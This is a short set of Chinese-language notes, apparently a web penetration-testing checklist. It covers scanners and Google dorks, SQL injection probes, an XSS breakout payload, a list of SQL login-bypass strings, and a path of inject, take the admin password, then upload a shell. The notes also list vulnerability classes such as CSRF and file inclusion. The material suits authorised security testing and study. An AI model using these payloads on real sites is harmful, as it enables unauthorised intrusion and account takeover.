***思路
1.WVS扫描器
2.目录扫描器
3.nmap扫端口
google***
site:网站域名 inurl:admin
链接是否有id传值:要尝试 sql注入和传参
SQL注入
如果是整数:
?id=79-0
?id=79-1
超过7位的数字,一般都是字符
如果是参数:
?id=abc'%2b'
?id=abc'%2b'a
搜索型方法
2011%' and '%'=' 实际情况<%2011% and '%'='%'>
2011%' and '%'='a
跨站:测试双引号是否被过滤
"121
查看源代码是否有"返,121数字是为了方便在源代码中查找。
如果尖括号被屏蔽可以尝试
" οnkeyup=alert(/xss/);b="
然后输入a 看是否有弹出
JS交互没有SQL注入 尝试XSS
网站后台
弱密码
万能密码
最短的:‘or’1
'or'='or'
1'or'1'='1--
'or''='
"or=or"
'or''=''or''='
'or'='or'
'or'='1'
'or' '1'='1'
or 'a'='a'
'or'a'='a--
'or'='or'
经验证,'or''=''or''='的效果是最好的!
暴力破解
SQL注入
找回密码功能,查看是否将不同的用户修改密码发送到不同人的地址
登陆成功的情况下查看cookie 是否有防护
后台目录扫描工具:
1.后台登陆地址
2.编辑器
3.找***
nmap:
旁站
常规思路 注入拿到管理密码,登陆后台,上传***
SQL注入另类应用:差异备份
——————————————————————————————
常见漏洞
间接信任***:CSRF URL重定向
dump的东西 文件包含 路径遍历
***用 WVS
安全检测 appscan
上传 CSRF 模块 不安全对象引用是扫不出来的
1.SQL注入
2.XSS
3.上传 前端上传 后端上传
4.CSRF(是在后台登陆的情况下) 资料修改 发布留言 只要可以破坏别人东西的都属于CSRF 如果存在验证码就不用猜了
CSRF防护有两种 验证码和token 可以截包后删除token看是否还可以修改用。
漏洞证明过程
漏洞的修复建议
5.命令执行漏洞
截包看命令
struts 2 存在于Java环境
tomecat
cgi漏洞 存在于php环境
6. 不安全对象引用
7.URL重定向
8.文件包含 目录遍历
9.模块缺陷 --属于权限绕过的漏洞 (如忘记密码, 校验码什么的 文章编辑)
判断模块
10 目录浏览 本来应该是403的成了200 例如 http://xxx.com/admin 列出相关信息